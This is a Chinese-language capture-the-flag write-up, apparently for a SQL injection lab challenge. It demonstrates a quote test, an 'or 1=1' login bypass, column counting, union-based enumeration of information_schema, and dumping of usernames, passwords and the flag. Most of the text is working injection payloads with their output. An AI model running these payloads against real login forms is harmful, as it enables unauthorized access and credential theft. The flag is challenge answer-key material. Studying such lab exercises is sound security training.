测试是否有单引号注入
1'
回显为:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'password'' at line 1
万能钥匙
1' or 1=1#
回显:
Your password is'22ec72d47e489fbbdf39acd7a87f99ac'
测试字段数
admin' order by 4#
回显:
Unknown column '4' in 'order clause'
说明有四个字段,猜测为:id、username、password
测试回显字段
1' union select 1,2,3#
回显:
Hello 2!
Your password is '3'
可以看到2、3有回显,2代表用户名,3为密码
接下来就可以利用2、3的回显进行注入
测试表
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
回显:
Hello 2!
Your password is 'geekuser,l0ve1ysq1'
可以看到有geekuser,l0ve1ysq1两个表
查看表的字段
geekuser表
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#
回显:
Hello 2!
Your password is 'id,username,password'
l0ve1ysq1表
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
回显:
Hello 2!
Your password is 'id,username,password'
查表
geekuser
1' union select 1,2,group_concat(id,username,password) from geekuser#
回显:
Hello 2!
Your password is '1adminef4087e987fdee056a7d7eb6f611d235'
l0ve1ysq1
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
回显:
Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{ac289490-df8d-4a2c-a934-e56fbcd2d8c2}'
得到flag
flag{ac289490-df8d-4a2c-a934-e56fbcd2d8c2}